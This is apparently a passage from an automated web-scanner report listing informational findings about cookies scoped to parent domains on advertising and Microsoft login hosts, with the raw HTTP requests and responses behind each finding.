X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.23. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByDua)_c8i=$Q>#Pvc?C)P`v@4k0ctqVFM6=0:/(ks:NJow1z9ZK#?lOhm8V#v*7V*E?1lu=H(C*gZx2Ss=I?O/(z']Jx6M-Yi:*bjdCbN.KrKr`@`A[R[IBgy43C@cY2=dfT]IeCUBz69MK3ZUHfnG%ibT_/3-3m.rkh<amjMpWU-*-0Mb+H4y9%P6$Em=F5/V)pO[bZ]mCjKOvYhqRW`a$!QSz7rjRQ:*8M8)%:B[r1vowtVtRH]hjeJl_)9VrN=mFVq3sWLxB]G+VoQOkA7hBRzJ+=^m0Pe)kdaZvNipde7=7[-I#UWot%[$8UCate]WFQ/8*1FSM[7oDlL69<g*fJhpk`_4m05/^79%>*qB=kgR%FhNv(fz5jjk]##:H9`-6G'N]hl:'q6B!1TA>AYt/cEb:`C1Xr3UnD3@1NrztYAoL7ej0/!sPnUHG[>??u?v0KnVr6xKD6NXx@s!ixnTl5I*kZ[_6(`Q7Tq60)ra)#eyePji't21Q`i'CXwEAlUsslmO6c75hE^dm`4aV!iQpu)IMN+9HTTY7v^6]L'_?tY-2m)dTbp_>b8n$fnCKg(zP#*b#WTu.#2]xa(=4I+KTweO!TDHdQ:U-8yV2+e^BGZtf+oc5Gye`@h[wA>fUiG@vI3`o_5^kvHLg]PGyQZoWI>PnoCLnRwd%)7wxrg=H6J:vUQt'5*dU50F]3DuO^8CGS!l/e`A`<>>>BRHx`!u)fSLhN:qx-N5UHv_DRuWHU33e4.aTc:EU8iA1:ERF28?G[jOx/eR:8=g^)[wR/#

Response

9.24. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.25. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:21:55 GMT
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT
X-Brilig-D: D=6320
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999'width='0' height='0'></iframe>

9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hD9CU6do67BSgtgzWLK0cp566K2jLwzIRCIvylf4jXnXP+nYXfLWPrrGpnpaNZYHJ1HHqZT8VuypYmSEFZqKHipd3aEwUhBo+mqE5zXET/h0klTCO9quapUf84+RmhVKJgALVfezSf6cGLHRLqvYIQjT0kZECrrMnXA61RhpDsiQy8dcK/k7n1qfz3YC3yT7etQaMISozANh3vt+h0w5Ovdc+9BKxyVFaO/wTDXwDhV1ddBUJ76LLVvrhhAtAVLDpe1QuW+7UWcc18GifYdM1blY9oSwaISLoiEnn9Wz6vPio3OQB1vIOCu3lM3HLnhiEc3h1+e16CEwmxW8MNE50h5hbd3zFCAa09+LTEEB1RTC3QIR16NfHLy3I3DPw2HO9V+T3KCfhRH7Rg8tutSR9MbJsLBQt7wRFY4b7pt+OSRflmO4pYi0UuQzePGvo19Y8IUuUV/zOjE1mQfOKK7DopTL+CsWEWUSJe8bpmC9Rd8/nTV2P/01Z63CBvueh2hEAMypvqNGRLM9cAA7yQ66kbISCTJfF8PdqmoFwvNb2+q/Q1Fi7eDooDJAAkg894vEe0b//ngn1SENv8WVi7s/QeaYOnEa55YqmlqyDzADnokGFhzq7R8gFjRjefRSiaq5PK0sTx2Mq3hqMi8kZ3QSboUD02pD6aTSPxlx7HptL76Cb3+302TH/EMRNaSGk9pll5Z3oocznWfi1sFhdN0pzfrnt5tG6R8eyHY6EP7re6Oy374; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
udm_0=MLv3NzMJZjpn3hepL5u85DdJSwns63EnKfX2nh8cWigJwgSuviYqkQXc89yvIeq9+M8WRtyXBOh9HXIAUS4g+2BN2COW4LBvc3ZVyH5QJHJ9JlA5kaOwaneDKCp6W6nRvKxjoLa+84C9EswWzlqVOZx3Pe+iT7uvOO2UmYgAIvXe2xeoUZXx7GgIX0hYmiAS1KK52oofEk69n+/2zO1WPujuU+nVEV6xlw3DA9vTuj2OXbf94Odr80dMBNmeAaMfnpuAg8XR3mEVTQemosaYLVED7cDgyGAFyV5jSqpmW2ZyPgafSd1iAX0Ez6Z45DWgSHO1alQm1K8I4b8/nwPzag42qICFBZDyl1zqzkL/iGAJt8X0iANCqb0G+3jwnnQkZ11WyWA+7hHnnytRYiyNq+ZP2WMVOznpi0bP1BZzgnwCI+neNQQ7yMtALEzl5AZBVftrS44LsIeH8Kv/qcjQYKB0ZWI88v+gaNLRVyeyrNPnFHb8SGftVF6qRffReEsI9/yM3HweOU6SwigjIT81Ff97T0Ftxpc5J7yeQTeILjgZWjaQnDihOjYx6885VNGtb7nQRPdxVQjL6M4DAu/5RO2vmeANOhYGYGMsbyuxCkriR4pziSXX67UTNKaIMwWnc06IQUPunqaV4UE8RvNq++Lpkrh9+1ZMeOMemnIrt3nFPjo6GDOGsLagycIEu3AIiM3kjZwsoHehLHdFkoPXjNOcg9G72o2vMzc1qYZRA2+zGgkfG8IziLRU0TNM++7tzhOU94r2SKPtrr68L6Eha1lGsbyV28/mjf+N7XhDL2n0eiJIpDgwzPSKaVkpFYnbK8WKz4dx4wCRADaanjv7gOcCF55UYjgRlJX/vNjHM6kWP9P8lCN6qMwfdHdJn4XNtJVdtcegph6wQ86wBERfribSPog6hU8XD8zOAV+X0NTXGvsPMlWrA6t2B+1aj5Np3h3J+RQfPxlm1xpHrTUwceZAQRgv3+6Y083L2UXZAxnZoo5jHRCe4UpAHFW3i4Ij5buFivhOoJ+61mUI6S3Y1LM84UcS84ZIfXkKhjf0ozZp1mYUEE2QGvOxbmrXFz/2IkSYgCXmXZTmPMkX+tFRct4/4yOCCgY4SMmhgrDi0+8lGx0CxL5lMNi4EbwIKTfFA+xsWwxLqbym/GHWjF2RqL1IIXGlNbS4MV+yRUV/BQsdepAb4mauU4GBCH2gNjzGFBtF5sHZtb0qbqMotK/Ad6qJ4nEFC13nkBu6QW3P4Au5oJQJP0qSM0YVXbbtq8mUBxf8ToEioahQIrPYjNOz1XIuPdNGO9pZ177Em8pstn02a04vRy4hUFFsbfkM8ricaS/vWyB09JBiM99JQdqgtkBdNXwwI4fxYPJuFsA8i8qJO3WL0xQ8OToYp4TOssG1giQRXBCOcuebW++WI8DImL69geiAN/Xu1TKkrChFhlZ2E4jTzgnA2NJHiEIMFqiD1GtNBCz1cFO9p9DSZjwdV1Vj677EGkwP5m2Z1knEBN1Jdis2oTIYhE7mwm9EWLOCmODdZtkBd9+rAdC5o3CttbVsMhClh1R4czt9np/0wuBinHRjpCo9fZp+AwfQGfIa5+Wz1yBM24afElvE+unPmmNYdrBiRTAHXc/pU4jTm/gHIt2BN7PofAeMT3yBhWsPDgjYgOtNXJBrwNcZt0bUuSJjcigK094nvOhdbcH4dYGoChnibu/Y96JzuyUL25IYblD299R/B11cNdwtI7cnEiJGWHve7Sxiv3IoWALmq30vTDzqO6qLBv3kL33URsedu+bv+n59ttgXFOLmwiPYbtIGk4I=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==; rsiPus_feb9="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LKjcZyqckugFnBiR0Zn/IsFdk0/rFRTV9qpAPalIhg6ctdKRDh0s/thiFDr8zSnOiJzdlLV+GP4C0aP3dFLRyc6fD3eGZF5paPafjW8xN/6f61iDbn5Scf4ENowP7/1SoiwONbYeu6xZ2hfIMUOAP0wYi5HYzKJgrBhF1IX9Zd5O2Lmz0H8o1YhUZ/xNsWLqnbPSclagg1uZdIaEEX2X7mU9PpvkuJOErL8VIsMtmNeV8SkFkjFUOet0KGm5k8I/lS57L9061i+BOKKiB821tSxmzJvLeZjNqwNOktGg05gpiheC/gX34NVB3rHtCa9gdCWhoGBjXZ3Vek0xPaJoM2vQggaeofJWjtEizseUAZ8DqB3Bpvl+Q/ml47cZ0lKw7LawXyD58UNXC+2xj1oRnibe6D3B6lsMl4e22RyFZmDR/wOywu2mQO0J9hOUdK+nxEJozkuDVSbShPypBC8wJaxkeC1d41hzQM4nFlVLgxRcm5VUb+1qf+/lRdlarNizuUBS3eo7geSrmwmp6exVCwVOlj2Jj9fP7BnHPXwJ6dP7KZGbHV8En9dfBTXYwWNTvYgYB0GCPL/kkLLy6LUuk48I5Z8DCPCP3tSYk5a3xRXRYElTnYs44OJZ5L5mDPYj0iANpHQO1GLTP1KwhMnVobAuCAHWLm+4VbxffA3CBtNvKLlD/eF/gh5Wod9cqvBiz1hWTb4ij8COotPmMZcvatmS+hAlW9NvQ+GlR3LFrwx9U+2LONu5piZm6OS4EGsv1cip2BRmgE3yUIBr0q2bfQHwV8zdQzhThHV+MbBRAr2AebL+QcAIdxhTgx7JRKxi78B2nJxMoeJWcbPhr/XUIFqDTIthwHCAaAOn7NcAgDUsPznPOHwK62Y2m2wTSVt2bLefzLQrJsgwvV1ckk6OEkoK+K+oMHP390MTlJ6WZKDNPwPIitLRLuNkCr4NNOtgTNHeOehpjGXbCJn/lx1EAfOT9CRrt/F7ACN11dFiLoKmLbYt+lGtiaDq8E1KHPwNqbKR4pWoNzDoCopSiRYRtZD0Ft8IVgJioAjQ13lkHzlURVaOS50U7/4pN4X6i+A+lEz9OikZ1cOVXnRB9R6iyRafnQwrF/CtuR2+gMIjH7yc8soS/mvr9OcOyaNc6cmvTvza7q7WzE7OVGXcqHdC7x6MOkpZyDWhdtS0/OngDWbqYoAwJYpdiyIl1ijllxC4BtQR1dQ98cyYX/4NTwupjWmJACf4Kiw2z+NZXDXEseCmsCSBnARs0RKdPBkBBp7hjHFHKYmmSu9f6e+2ou02jTP8i1fC0GiKn8WlIPQl+P88osPPlstYfuy1877JO+Aq2okYoZqHk/ZQlwR8xUD9RPH8bTf7BU+eXH3xJq0K22dYC5plTYC4BgxUGVWnSwaeyypAv2r+561/B3gCB3gWwWPSZUvs76UJtUVeF7CblPshXTNoZC0YBMuVqFveGNrPuHEXdO0eMCUFxC6EBHId3CNr1Mt5iGiBtNQ=="; rsi_us_1000000="pUMV4j9DMIYVbY/ikx0KzFTj+FP87ZD9RDcPotrS7irqfu3qY4mFlBU4RjWfnjoBtdFs4WH3fJ6SXFZiS4a53zugCH5h+glQPB4sV4//RPT3TI3QN5T82ZUr/EpqQWf4RdnePtzNmGQEQI1D6tOTkfqk+GqQnQi8ZSCEdHfQHI8jIsrKKzwcxCWHgc0f5DJLLb7IRN11f/w+UvgpQsfP7GxBX1VXNiwtkuax2pbE2sMdZZ6ukKQGGhd6zImH+FwTxfJr3h/d58ejzinjY0Y8cCQnIIheka/NCb0ynwHx2Q9HlUftUEe+G8IP9BX9bwrU8+vYG3rcskqPsdoiTWJHWazmGKOyL+BtLxRTQKcggG6nDSHItI2lS4+kqYzKLIlyDDacwVi1Qz6Ynv1arcp3N4ANE70ZCYzt4MwYKV0nR45LNXVmpHW6j3pTpTB+Up1/bxv9LxVoD3G7J6V29zGBXC+ZYf7+Y+zAy/fmMg454372IY6WkhFI/0egVGf/kYE39SJUM5rTcW0Z7lmVNnaFsF27dHeDaQxXEx/cutg3scRto6ngyjpVnMSGKRvlJ+eu7Zn5V/aSgcXvuALUjSEuR7gssyupFlO0wLxymarhFpMK94VXjj5yaQlJ8MUFlCP/qq/Q1MjKTybRe6jEydbnMGIk5KQ+9E